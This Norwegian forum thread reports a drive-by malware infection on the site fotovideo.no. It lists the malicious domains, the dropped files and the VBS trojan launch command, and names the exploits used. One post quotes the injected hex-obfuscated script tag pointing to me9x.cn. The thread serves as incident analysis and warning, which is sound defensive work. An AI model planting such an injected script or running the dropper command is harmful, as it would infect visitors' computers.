Info: hxxp://www.fotovideo.no infisert

5 innlegg i emnet

Skrevet (endret)

Nettsidene til fotovideo er infisert med Trojan-Clicker.HTML.IFrame.kr (F-secure), en infeksjon som mpx.no nylig var utsatt for.

Kode som vil koble seg til hxxp://www.luckffxi.com/index2.htm vil kjøres, og man får videre lastet ned noen filer knyttet til script som kjører iframes med variert innhold (samme script som mpx.no var smittet med)

De som står bak har lagt inn en teller -de er altså interessert i statistikk. Dette tyder på at det kan ligge en form for oppdrag bak dette - betaling pr. infisert pc?

ref. http://www.diskusjon.no/index.php?showtopic=1078150

En diagnose av nettstedet luckffxi.com viser at antall skadelig programvare omfatter 263 trojan(s), 232 scripting exploit(s). Et riktig ormebol, med andre ord.

Følgende filer blir opprettet:

Temporary Internet Files\Content.IE5\C4ESWJ2L\14[1].htm

Temporary Internet Files\Content.IE5\C4ESWJ2L\flash[1].htm

Temporary Internet Files\Content.IE5\CHT2SY0U\index2[1].htm

Temporary Internet Files\Content.IE5\CHT2SY0U\sa[1].aspx

Temporary Internet Files\Content.IE5\CHT2SY0U\swfobject[1].js

Temporary Internet Files\Content.IE5\OTAFWPMF\count1[1].gif

Temporary Internet Files\Content.IE5\OTAFWPMF\irr[1].htm

Temporary Internet Files\Content.IE5\YIQUT0RH\click[1].aspx

Temporary Internet Files\Content.IE5\YIQUT0RH\svchost[1].exe

C:\WINDOWS\Gameeeeee.pif

C:\WINDOWS\Gameeeeee.vbs

Deretter kjøres dette:

"C:\WINDOWS\system32\cmd.exe" /c C:\WINDOWS\Gameeeeee.vbs

Fila Gameeeeee.vbs blir detekter som en Trojan.Agent og forsøker å laste ned annen malware.

Denne type malwarespredning kalles Drive-by (har blitt svært vanlig - det er vel ikke veldig mange som får virus via epost lengre? )

En drive-by nedlasting utnytter en software bug i en nettleser, som muliggjør at en angriperen f.eks. kan kjøre skadelig kode, krasje nettleseren, eller lese data fra datamaskinen.

Infeksjonen på FotoVideo (og forøvrig mpx (se tidligere tråd) ) prøver å utnytte sårbarheter knyttet til (i IE 7) XML heap korrupsjon, Snapshot Viewer ActiveX Exploit, NCTsoft AudFile.dll ActiveX Control Remote Bufferoverflyt Exploit, og andre.

Endret av norbat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

avast stoppet dette med en gang, i alle fall. Må jo prøve... :P

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

avast stoppet dette med en gang, i alle fall. Må jo prøve... :P

Nysgjerrigper :P

Hva kalte Avast dette - VBS:Obfuscated-gen?

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jepp. Med en [trj] etter. :P

EDIT:

Ser ut som problemet er fikset. :) Ingen merkelig url i adressefeltet lenger, og ingen advarsler fra Avast.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Mulig. Men det ligger fortsatt en injektion der av typen <script src=http://%6D%65%39%78%2E%63%6E/ken.gif></script>

Adressen er skrevet i HEX. Dekrypterer man dette, får man adressen me9x.cn.

Dette nettstedet er knyttet til et rottereir med malware (Malicious software includes 250 scripting exploit(s), 115 trojan(s). ref. google)

Edit: Er nok bare en rest ( adr. til gif-bildet), men nok til at enkelte AV-prog. blokkerer innhold når man besøker siden.

Endret av norbat
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive